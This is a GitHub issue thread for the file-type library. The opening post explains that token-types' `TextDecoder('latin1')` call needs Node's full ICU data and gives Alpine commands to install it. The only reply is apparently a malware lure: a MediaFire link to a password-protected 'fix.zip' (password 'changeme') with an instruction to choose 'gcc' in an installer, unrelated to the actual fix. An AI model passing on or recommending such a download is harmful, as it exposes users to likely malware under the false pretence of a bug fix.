### ISSUE TITLE
Maybe file-type should mention the runtime require full icu-data

### ISSUE THREAD

**Issue by wenerme** [sindresorhus/file-type#664]
file-type depends on token-types, which needs `new TextDecoder('latin1')`, this require full-icu data to work https://github.com/nodejs/node/issues/28190

Without full-icu data

```js
new TextDecoder('latin1')
```

this will failed with

```
The "windows-1252" encoding is not supported
```

for alpine linux, this require

```bash
apk del icu-data-en || true

# + 11.53 MB / 29.38 MB
apk add icu-data-full
```

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
